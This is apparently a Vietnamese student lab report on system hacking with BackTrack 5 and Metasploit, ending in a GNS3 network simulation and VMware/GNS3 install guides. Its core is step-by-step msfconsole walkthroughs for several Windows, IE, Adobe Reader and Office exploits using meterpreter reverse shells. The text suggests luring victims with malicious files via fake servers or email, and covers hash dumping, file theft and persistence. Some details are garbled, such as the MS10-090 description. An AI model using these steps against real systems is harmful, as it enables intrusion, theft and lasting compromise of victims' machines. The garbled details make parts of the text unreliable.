Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển
để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác
nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong
phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối
Linux Ubuntu 11.10.
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác
nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas
M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại
Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack
là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và
Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử
nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong
Huỳnh Minh Trí Page 19
21. System Hacking
Backtrack 5 có thể được phân loại như sau:
– Information gathering: loại này có chứa một số công cụ có thể được sử
dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail,
trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các
thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
– Network mapping: loại này chứa các công cụ có thể được sử dụng để
kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục
tiêu, và cũng làm portscanning.
– Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy
các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng
chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và
Simple Network Management Protocol (SNMP).
– Web application analysis: loại này chứa các công cụ có thể được sử
dụng trong theo dõi, giám sát các ứng dụng web.
– Radio network analysis: Để kiểm tra mạng không dây, bluetooth và
nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể
loại này.
– Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác
các lỗ hổng tìm thấy trong các máy tính mục tiêu.
– Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào
các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để
nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.
– Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong
Huỳnh Minh Trí Page 20
22. System Hacking
việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có
được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để
duy trì quyền truy cập.
– Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các
công cụ trong thể loại này.
– Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công
cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa
cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ
cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong
trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và
các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
– Reverse engineering: Thể loại này chứa các công cụ có thể được sử
dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi.
2. Phần mềm Metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để
kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ
ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C,
assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành:
Linux, Windows, MacOS. Chúng ta có thể download chương trình tại
www.metasploit.com
Metasploit hỗ trợ nhiều giao diện với người dùng:
– Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng
Huỳnh Minh Trí Page 21
23. System Hacking
các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
– Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao
diện Web.
– Command line interface: dùng msfcli.
Metasploit Enviroment:
– Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg,
những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các
module exploits.
– Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và
unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại,
không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment
mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu
trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện.
Sử dụng Metasploit Framework:
2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà
Metasploit có hỗ trợ để khai thác
Show exploits: xem các module exploit mà framework có hỗ trợ.
Use exploit_name: chọn module exploit.
Info exploit_name: xem thông tin về module exploit.
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các module
trên www.metasploit.com hoặc qua lệnh msfupdate hoặc
svnupdat/opt/metasploit/msf3/
Huỳnh Minh Trí Page 22
24. System Hacking
2.2 Cấu hình Module exploit đã chọn:
show options: Xác định những options nào cần cấu hình. set: cấu hình cho
những option của module đó.
Một vài module còn có những advanced options, chúng ta có thể xem bằng
cách gõ dòng lệnh show advanceds.
2.3 Verify những options vừa cấu hình:
check: kiểm tra xem những option đã được set chính xác chưa.
2.4 Lựa chọn target:
show targets: những target được cung cấp bởi module đó. set: xác định
target nào.
2.5 Lựa chọn payload:
show payloads: liệt kê ra những payload của module exploit hiện tại.
info payload_name: xem thông tin chi tiết về payload đó.
set payload payload_name: xác định payload module name. Sau khi lựa
chọn payload nào, dùng lệnh show options để xem những options của payload
đó.
show advanced: xem những advanced options của payload đó.
2.6 Thực thi exploit:
exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ
cung cấp cho chúng ta những thông tin về hệ thống được khai thác.
3. Sơ đồ tổng quan hệ thống mạng LAN
Huỳnh Minh Trí Page 23
25. System Hacking
Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với
khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, …
Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là
chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở
trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống
mạng để biết được địa chỉ IP các host có trong mạng.
Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện
mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap)
được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào
có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung
cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc
Huỳnh Minh Trí Page 24
26. System Hacking
gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy
được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho
Linux, Windows, và Mac OSX.
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công
cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai
thác truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus.
Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ
thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload
files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài
trojan/ backdoor …
4. Xâm nhập và khai thác Windows XP
Hacker:
– Hệ điều hành Back Track 5
– Địa chỉ IP: 10.10.10.2
4.1 Khai thác lổ hỏng Ms10-090
a) Mô tả:
Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng dụng
web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra khóa giải mã
trong một thời gian ngắn. Hiện tại chưa có bản vá chính thức cho lỗi này.
b) Phần mềm bị ảnh hưởng:
Tất cả các hệ điều hành dùng các phiên bản IE6 , IE7 và IE8
c) Cách thự hiện tấn công:
Huỳnh Minh Trí Page 25
27. System Hacking
Khởi động msfconsole tử cửa sổ terminal của BackTrack:
> msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options:
> search ms10_090
> use exploit/windows/browser/ms10_090_ie_css_clip
> show options
> set srvhost 10.10.10.2
> set lhost 0.0.0.0
> set PAYLOAD windows/meterpreter/reverse_tcp
> exploit
BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80iT1b69v).
Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc
sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn
nhân đó.
Tiến hành khai thác máy nạn nhân
> sessions
>sessions –i 1
4.2 Khai thác lổ hỏng Ms10-042
a) Mô tả:
Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một
Huỳnh Minh Trí Page 26
28. System Hacking
trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp
vào một liên kết thiết kế đặc biệt trong một thông báo e-mail.
b) Phần mềm bị ảnh hưởng:
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003
with SP2 for Itanium-based Systems
c) Cách thực hiện tấn công:
Khởi động msfconsole tử cửa sổ terminal của BackTrack:
> msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options:
> search ms10_042
> use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
> show options
> set srvhost 10.10.10.2
> set lhost 0.0.0.0
> set PAYLOAD windows/meterpreter/reverse_tcp
> exploit
BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80). Chỉ cần
Huỳnh Minh Trí Page 27
29. System Hacking
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang
máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
Tiến hành khai thác máy nạn nhân
> sessions
> sessions –i 1
4.3 Khai thác lổ hỏng Ms12-004
a) Mô tả:
Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập
tin phương tiện truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành
công lỗ hổng có thể lấy được quyền sử dụng giống như người dùng địa phương.
Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ
thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với
người sử dụng quyền hành chính…
b) Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows
Vista Windows Server 2008 Windows 7 Windows Server 2008 R2
c) Cách thực hiện tấn công
Khởi động msfconsole tử cửa sổ terminal của BackTrack
>msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options:
> Search ms12_004
> use exploit/windows/browser/ms12_004_midi
Huỳnh Minh Trí Page 28
30. System Hacking
> show options
> set srvhost 10.10.10.2
> set lhost 0.0.0.0
> set payload windows/meterpreter/reverse_tcp
>exploit
BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80). Chỉ cần
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang
máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
Tiến hành khai thác máy nạn nhân
> sessions
> sessions –i 1
4.4 Khai thác lổ hỏng file PDF qua Adobe Reader 9.x
a) Mô tả:
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có
đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có
chứa mã độc đó lên (các bạn có thể tạo một Webserver giả mạo, dụ nạn nhân tải
file đó về hoặc có thể gửi kèm theo mail, quăng lên các mạng xã hội, các nơi tải
file…) và máy nạn nhân đang sử dụng AdobeReader 9.x. máy nạn nhân sẽ bị
“nhiễm độc”.
b) Phần mềm bị ảnh hưởng:
Adobe Reader 9.x chạy trên nền Windows XP SP3
Huỳnh Minh Trí Page 29
31. System Hacking
c) Cách thực hiện tấn công:
Điều kiện: Victim phải cài đặt phần mền Adobe Reader 9.x
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
>msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options:
> Search nojs
> use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
> show options
> set filename test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf)
> set payload windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
> set lport 5555
>exploit
Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file pdf có chứa mã
độc, file sẽ được lưu tại root./msf4/test.pdf
Tiếp tục thực hiện các bước sau:
> use multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
Huỳnh Minh Trí Page 30
32. System Hacking
> set lport 5555
> exploit
Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn
nhân mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn
nhân.
4.5 Khai thác lỗ hỏng Ms12-027
a) Mô tả:
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có
đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có
chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải
file đó về hoặc có thể gửi kèm theo mail, …)
b) Phần mềm bị ảnh hưởng: Microsoft Office 2003 Microsoft Office 2007
Microsoft Office 2010 (ngoại trừ phiên bản x64-based editions) Microsoft
SQL Server 2000 Analysis Services
Microsoft SQL Server 2000 (ngoại trừ phiên bản Itanium-based editions)
Microsoft SQL Server 2005 (đối với Microsoft SQL Server 2005 Express
Edition chỉ thực hiện được trên Advanced Services)
Microsoft SQL Server 2008 Microsoft SQL Server 2008 R2 Microsoft
BizTalk Server 2002 Microsoft Commerce Server 2002 Microsoft Commerce
Server 2007 Microsoft Commerce Server 2009 Microsoft Commerce Server 2009
R2 Microsoft Visual FoxPro 8.0 Microsoft Visual FoxPro 9.0 Visual Basic 6.0
Runtime…
Huỳnh Minh Trí Page 31
33. System Hacking
c) Cách thực hiện tấn công:
Điều kiện: Victim phải cài đặt phần mềm Microsoft Office Word 2007 Khởi
động msfconsole tử cửa sổ terminal của BackTrack.
> msfconsole
Khai báo lỗ hổng sử dụng và thiết đặt options:
> search ms12_027
> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> show options
> set filename test.doc (đây là tên do mình tự đặt với cú pháp *.pdf)
> set payload windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
> set lport 5555
> exploit
Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa
mã độc, file sẽ được lưu tại root./msf4/test.doc
Tiếp tục thực hiện các bước sau:
> use exploit/multi/handler
>set payload /windows/meterpreter/reverse_tcp
> set lhost 0.0.0.0
> exploit
Huỳnh Minh Trí Page 32
34. System Hacking
Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho
máy nạn nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua
và chúng ta có thể chiếm quyền sử dụng máy nạn nhân
4.6 Khai thác thông tin sau khi đã tấn công:
Xem thông tin hệ thống:
> getuid
> sysinfo
Tải lên và đánh cắp tài liệu
– Tải file abc.txt tại Desktop của Back Track lên ổ C của XP
> upload /root/Desktop/abc.txt C:/
– Đánh cắp file xyz.txt tại ổ C của XP và đem về Desktop của Back Track
> download C:/xyz.txt /root/Desktop
Lấy hashpass:
> haskdump
Khám phá ổ đĩa:
meterpreter> shell
– Chuyển dấu nhắc sang ổ đĩa C:
> cd c:
– Liệt kê tài nguyên trong ổ C:
> dir
Huỳnh Minh Trí Page 33
35. System Hacking
– Tạo thư mục abc trong ổ C:
> md abc
– Xóa thư mục abc trong ổ C:
> rd abc
– Xóa file abc.txt trong ổ C:
> del abc.txt
– Trở về meterpreter:
> exit
Giữ kết nối với Victim khi Victim mất mạng hay khởi động lại tại port 5555
> run persistence -A -S -U -X -i 1500 -P 5555
Huỳnh Minh Trí Page 34
36. System Hacking
PHẦN 4 : GNS3 VÀ MÔ PHỎNG HỆ THỐNG ĐƯỜNG
MẠNG INTERNET
1. GNS3 là gì?
GNS3 là 1 chương trình giả lập mạng có giao diện đồ họa cho phép bạn có
thể giả lập các loại router Cisco sử dụng IOS (hệ điều hành của router) thật,
ngoài ra còn có thể giả lập các thiết bị mạng khác như ATM, Frame Relay,
Ethernet Switch, Pix Firewall… và đặt biệt có thể kết nối vào hệ thống mạng thật
và sử dụng như thiết bị thật.
GNS3 được phát triển dựa trên Dynamips và Dynagen để mô phỏng các
dòng router 1700, 2600, 3600, 3700, 7200 có thể sử để triển khai các bài lab của
CCNA,CCNP,CCIE nhưng hiện tại vẫn chưa mô phỏng Catalyst Switch.
Ngoài ra, GNS3 còn có chức năng liên kết máy ảo với VMWare và kết nối
Internet để thực hiện mô phỏng các sơ đồ mạng thực tế.
2.Mô phỏng mạng Internet để tấn công từ máy Backtrack tới máy XP:
Mô hình mạng mô phỏng:
Nhà Hacker: máy Backtrack nối với R1: 10.10.10.0/30
Nhà Victim: máy win XP nối với R2: 10.10.10.12/30
Mạng Internet: router ISP nối với R1: 10.10.10.4/30, R2: 10.10.10.8/30 và
kết nối ra Internet: 203.164.4.2/24
Huỳnh Minh Trí Page 35
37. System Hacking
Cấu hình:
R1: conf t
int fa 0/0
ip add 10.10.10.1 255.255.255.252
ip nat inside
int s 0/0
ip add 10.10.10.5 255.255.255.252
ip nat outside
exit
access-list 1 permit 10.10.10.0 0.0.0.3
ip nat inside source list 1 int s 0/0 overload
ip nat inside source static tcp 10.10.10.2 3389 10.10.10.5 3389
ip nat inside source static tcp 10.10.10.2 4444 10.10.10.5 4444
Huỳnh Minh Trí Page 36
38. System Hacking
ip nat inside source static tcp 10.10.10.2 5555 10.10.10.5 5555
ip nat inside source static tcp 10.10.10.2 80 10.10.10.5 80
ip nat inside source static tcp 10.10.10.2 8080 10.10.10.5 8080
router ei 1
no auto
network 10.0.0.0
passive-interface fa 0/0
router eigrp 1
network 10.10.10.4 0.0.0.3
no auto-summary
R2: conf t
int fa 0/0
ip add 10.10.10.13 255.255.255.252
ip nat inside
int s 0/1
ip add 10.10.10.10 255.255.255.252
ip nat outside
exit
access-list 1 permit 10.10.10.12 0.0.0.3
ip nat inside source list 1 int s 0/1 overload
router ei 1
no auto
network 10.10.10.12 0.0.0.3
Huỳnh Minh Trí Page 37
39. System Hacking
network 10.10.10.8 0.0.0.3
ISP: conf t
int s 0/0
ip add 10.10.10.6 255.255.255.252
int s 0/1
ip add 10.10.10.9 255.255.255.252
int f 0/0
ip add 203.162.4.2 255.255.255.252
router eigrp 1
no auto
network 10.10.10.8 0.0.0.3
network 10.10.10.12 0.0.0.3
ip route 203.162.4.0 255.255.255.0 203.162.4.1
ip route 0.0.0.0 0.0.0.0 203.162.4.1
Sau khi cấu hình xong máy Backtrack và XP có thể ping được ra Internet
nhưng không thể ping được lẫn nhau.
Với mô hình này chúng ta có thể xem như đây là 2 đường mạng riêng biệt
không biết địa chỉ của nhau như đường mạng Internet thực tế.
Ta tiếp tục thực hiện tấn công từ máy Backtrack tới máy win XP.
Huỳnh Minh Trí Page 38
40. System Hacking
PHẦN 5: TỔNG KẾT
Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá
trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp
nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau:
– Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ
hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra.
– Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được
băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tìm
– Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair
sau mỗi lần backup dữ liệu bằng rdisk.
Trong quá trình sử dụng máy tính để truy cập Internet, cần lưu ý:
– Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng
hoặc không tin cậy.
– Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của
mình.
– Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm
bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến).
– Cài đặt phần mềm diệt virut Internet Security.
– Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật v á lỗi
và hỗ trợ kỹ thuật từ nhà cung cấp.
Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà
quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính
Huỳnh Minh Trí Page 39
41. System Hacking
của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy
tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự
kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net,
Openfiles, Netstat, Find.
PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT MỘT SỐ PHẦN MỀM
1. Cài đặt VMware
Đầu tiên các bạn vào địa chỉ http://www.vmware.com để tải Vmware phiên
bản mới nhất về cũng như là đăng ký bản quyền cho Vmware.
Tiếp đó các bạn mở file cài đặt Vmware đã được tải về.
Chương trình cài đặt sẽ bắt đầu sau khi load xong một số file quan trọng
Huỳnh Minh Trí Page 40
42. System Hacking
Chọn Next
Có 2 lựa chọn cho quá trình cài đặt: Typical hoặc Custom
Huỳnh Minh Trí Page 41
43. System Hacking
– Typical: chọn nơi sẽ cài đặt và chọn Next để tiếp tục
Huỳnh Minh Trí Page 42
44. System Hacking
– Custom: chọn các gói cài đặt thêm; nếu chọn gói debug Eclipse thì phải
chọn cả 2 gói Java và C nếu không chương trình sẽ báo lỗi -> Chọn Next để tiếp
tục
Huỳnh Minh Trí Page 43
45. System Hacking
Lựa chọn nơi chương trình sẽ tạo shortcut -> Chọn Next
Chọn Continue để bắt đầu cài đặt
Huỳnh Minh Trí Page 44
46. System Hacking
Quá trình cài đặt bắt đầu … quá trình này có thể kéo dài từ 5′~10′
Huỳnh Minh Trí Page 45
47. System Hacking
Cài đặt hoàn tất chương trình sẽ yêu cầu đăng ký bản quyền, Chọn Next
hoặc các bạn có thể bỏ qua bước này bằng cách Chọn Skip
Kết thúc quá trình VMW7 sẽ yêu cầu khởi động lại máy tính. Có thể kô cần
khởi động lại mà vẫn có thể khởi động được chương trình
Huỳnh Minh Trí Page 46
48. System Hacking
Trong lần khởi động đầu tiên VMW sẽ muốn bạn xác nhận lại là có muốn sử
dụng chương trình hay kô! Nếu có chọn Yes -> Chọn OK để xác nhận
Đây là giao diện làm việc chính của chương trình
Huỳnh Minh Trí Page 47
49. System Hacking
2. Cài đặt máy ảo bằng VMware:
Sau khi tải về và cài đặt trên máy tính bạn khởi động chương trình VMware
bằng cách chọn đúp vào biểu tượng ngoài màn hình Desktop, và làm theo các
bước sau:
Từ màn hình chính bạn chọn Menu File > New > Virtual Machine… hoặc
Ctrl+ N
Huỳnh Minh Trí Page 48
50. System Hacking
Chọn Next
Bạn chọn Typical để cài mặc định sau đó Chọn Next
Huỳnh Minh Trí Page 49
51. System Hacking
Phần mềm hỗ trợ cho bạn rất nhiều hệ điều hành từ Windows đến Linux
hoặc Sun Solaris... Bạn chọn hệ điều hành và phiên bản rồi Chọn Next để
tiếp tục
Ở đây tôi chọn cài hệ điều hành Windows XP 64 bít, bạn cũng có thể thay
đổi thư mục lưu trữ tại Location, rồi Chọn Next để tiếp tục
Huỳnh Minh Trí Page 50
52. System Hacking
Tại đây bạn nên chọn Use Brided Networking để cải đặt cho Card mạng
của mình và Chọn Next để tiếp tục
Tại đây bạn có thể thay đổi giá trị của ổ cứng trên máy ảo (Mặc định là 8Gb) và
Huỳnh Minh Trí Page 51
53. System Hacking
Chọn Finish để kết thúc quá trình lựa chọn cấu hình máy ảo.
Như vậy là quá trình lựa chọn cấu hình máy ảo kết thúc
Huỳnh Minh Trí Page 52
54. System Hacking
Bạn cũng có thể thay đổi các thông số như dung lượng RAM, dương lượng ổ
cứng ngay tại đây.
Để thiết lập ổ CD-ROM cho máy ảo phục vụ cho cài đặt hệ điều hành bạn
Chọn đúp vào ổ CD-ROM.
– Nếu bạn muốn cài từ đĩa CD/DVD thì bạn tích chọn User phisical
Driver và chọn Auto Detect
– Nếu muốn cài từ file ISO có trong máy bạn tích chọn Use ISO image và
tìm đến file ISO trên máy của bạn
Huỳnh Minh Trí Page 53
55. System Hacking
Sau khi hoàn tất, để cài máy ảo bạn Chọn "Start this Vitual Machine"
Và bạn thực hiện cài bình thường như cài cho máy thật.
3. Cài đặt GNS3:
GNS3 có thể chạy trên Windows,Linux và Mac OSX.Để cài đặt phần mềm
trên Window dễ dàng chúng ta có thể sử dụng bộ cài đặt all-in-one cung cấp mọi
thứ bạn cần để chạy được GNS3.
Các bạn chọn file GNS3.exe trong phần thầy giáo gửi.
Tiến hành cài đặt
Huỳnh Minh Trí Page 54
59. System Hacking
Giao diện GNS3 sau khi cài đặt xong
3. Cấu hình cho GNS3:
Vào Edit > Add IOS images and hypervisors chỉ đường dẫn đến các file IOS
trong mục Setting
Huỳnh Minh Trí Page 58
60. System Hacking
Các bạn vào phần Image file: vào chọn đường dẫn tới phần tài liệu của thầy
giáo gửi có đính kèm file :c2691-adventerprisek9-mz.124-25c.bin
Huỳnh Minh Trí Page 59
61. System Hacking
Sau khi chọn đường dẫn xong các bạn nhấn Save.
Vào Edit > Preferences > Dynamips > Trong mục Excutable Path chọn
đường dẫn đến tập tin dynamip-wxp.exe trong thư mục cài đặt GNS3 , sau đó
bấm vào nút Test để kiểm tra lại hoạt động của Dynamip.
Huỳnh Minh Trí Page 60